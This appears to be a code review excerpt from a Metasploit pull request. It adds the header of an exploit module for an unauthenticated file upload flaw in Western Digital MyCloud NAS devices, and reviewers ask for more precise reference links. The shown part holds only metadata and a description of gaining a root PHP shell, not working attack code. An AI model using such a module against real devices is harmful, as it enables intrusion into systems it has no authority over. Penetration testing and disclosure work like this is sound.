modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb

```diff
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  HttpFingerprint = { :method => 'HEAD', :uri => '/web/', :pattern => [/Apache/] }
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Western Digital MyCloud multi_uploadify File Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits a file upload vulnerability found in Western Digital's MyCloud
+        NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php
+        PHP script provides multipart upload functionality that is accessible without authentication
+        and can be used to place a file anywhere on the device's file system. This allows an
+        attacker the ability to upload a PHP shell onto the device and obtain arbitrary code
+        execution as root.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Zenofex <zenofex[at]exploitee.rs>' # Initial vulnerability discovery, PoC, and Metasploit module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud'],
```

Comment:
This looks like it wants to be a deeplink to the actual vuln:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#Authentication_Bypass_and_Arbitrary_File_Upload_.28added_8.2F6.2F2017.29

Reply:
And if this is the first place the vuln has been properly documented, feel free to add a link to this PR:

https://github.com/rapid7/metasploit-framework/pull/9248

If it's described in a published DEFCON talk, a link to that presentation or paper would be super handy, too.